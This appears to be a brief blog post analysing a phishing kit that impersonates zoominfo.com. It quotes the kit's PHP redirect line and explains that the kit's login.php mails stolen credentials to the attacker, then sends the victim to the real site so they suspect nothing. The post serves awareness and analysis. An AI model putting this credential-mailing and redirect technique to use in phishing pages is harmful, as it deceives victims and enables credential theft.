https://www.virustotal.com/en/file/3521521d631a33a6e79d282774a77e0ed21cf92fc8b901bbc19f1f370055fa37/analysis/1515876307/
There is a login.php
that ends up mailing the user's credentials to the attacker
header("Location: http://www.zoominfo.com/business/customer-success");
What is that you may ask?
The php header() method sends a raw HTTP Header per the manual
http://php.net/manual/en/function.header.php
Which header? The location
https://en.wikipedia.org/wiki/HTTP_location
"To ask a web browser to load a different web page"
So this line in the phishing kit is basically saying "After the user gives the bad guys your credentials, the bad guys mails them to himself, then he no longer cares about the user so he redirects them to the legitimate zoominfo.com (The site he phished) to make the victim think they were on the legit site all along.
No comments:
Post a Comment